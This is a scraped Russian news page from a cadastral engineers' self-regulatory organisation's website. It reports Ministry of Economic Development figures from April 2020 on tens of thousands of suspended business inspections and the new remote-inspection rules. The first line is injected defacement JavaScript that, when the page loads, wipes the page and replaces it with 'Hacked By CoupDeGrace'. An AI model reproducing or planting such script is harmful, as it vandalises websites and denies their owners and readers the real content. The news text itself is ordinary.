document.addEventListener('DOMContentLoaded',function(){document.title='Hacked By CoupDeGrace';document.body.style.cssText='margin:0;overflow:hidden';document.body.innerHTML='
Hacked By CoupDeGrace
';});

Минэкономразвития России подвело очередные итоги еженедельного мониторинга количества плановых и внеплановых проверок, информация о котором докладывается в Правительство России.

Минэкономразвития России: приостановлено 50 тысяч проверок бизнеса

Подробности

Источник

16.04.20 Сведения о фактах

К концу предыдущей недели число проверок, приостановленных федеральными исполнительными органами, достигло отметки в 50,6 тыс., в то время как количество активных проверок уменьшилось с 14,6 тыс. до 6 тыс. 20 федеральных контролирующих органов полностью прекратили проведение проверок.

Назначение или продолжение проверок возможно лишь в исключительных обстоятельствах, таких как угроза жизни и здоровью граждан, возникновение чрезвычайных ситуаций, указания от Президента или Правительства России, а также для предоставления юридического статуса или специального разрешения (лицензии).

Большинство проверок (3,4 тыс.) проводит Роструд по специальному поручению главы Правительства с целью защиты трудовых прав работников, сохранения рабочих мест и выплаты зарплаты.

Несколько сотен проверок проводят такие органы, как ФНС России (0,7 тыс.), Ространснадзор (0,5 тыс.), Ростехнадзор (0,5 тыс.), Росприроднадзор (0,4 тыс.) и МЧС.

(0,2 тыс.) в России. Все остальные федеральные исполнительные органы проводят проверки в количестве, измеряемом десятками.

С 14 апреля 2020 года начинает действовать решение Правительства, которое определяет специфику проведения государственного контроля (надзора) в 2020 году. В соответствии с этим решением, вводятся дополнительные причины для проведения внеплановых проверок, включая проверки, связанные с угрозой нанесения вреда жизни и здоровью граждан. Такие проверки должны быть согласованы с прокуратурой. Кроме того, плановые проверки на объектах с чрезвычайно высоким и высоким риском должны быть возобновлены.

Постановление также определяет процедуру работы с проверками, которые были приостановлены с 18 марта 2020 года. Если причины для их проведения могут быть интерпретированы как угроза жизни и здоровью граждан, то после согласования с прокуратурой, эти проверки могут быть возобновлены и завершены. В противном случае, такие проверки должны быть завершены до до конца текущей рабочей недели.

Важным аспектом является то, что подавляющее большинство проверок будет осуществляться исключительно с помощью средств удаленного взаимодействия, включая аудио- и видеоконференции. Это позволит значительно уменьшить личные встречи между представителями власти и бизнес-сектора.

Министерство экономического развития России будет продолжать еженедельное отслеживание проведения запланированных и внеплановых проверок на протяжении всего периода применения специфических особенностей осуществления государственного контроля (надзора) и муниципального контроля в 2020 году.

Будь в курсе! Сообщество Народной СРО в Telegram

Информационный обмен, обсуждение проблемных вопросов отрасли, консультирование и просто общения приятных во всех отношениях людей )
ПРИСОЕДИНИТЬСЯ

Минэкономразвития России: приостановлено 50 тысяч проверок бизнеса

Опубликовано

16.04.20 14:00

Внесены изменения:

16.04.20 14:00

Просмотров:

1066

Владимир Викторович Ерёмин

Директор СРО Союз "Кадастровые инженеры" с 22 января 2016 г.

Рубрикатор

ПОДПИСКА

Актуальная информация

СРО Союз «Кадастровые инженеры» является членом Ассоциации «Национальное объединение саморегулируемых организаций кадастровых инженеров»" (сокращенное наименование - Национальная палата кадастровых инженеров). Номер и дата решения Президиума о принятии саморегулируемой организации в члены Национального объединения: Протокол № 04/24 от 29.03.2024г. Адрес: Москва, ул. Таллинская, д. 32, корпус 3, офис 10, тел. +7 (495) 518-93-20, mail: ki-rf@ya.ru
Этот сайт защищён фаерволом RSFirewall! для Joomla!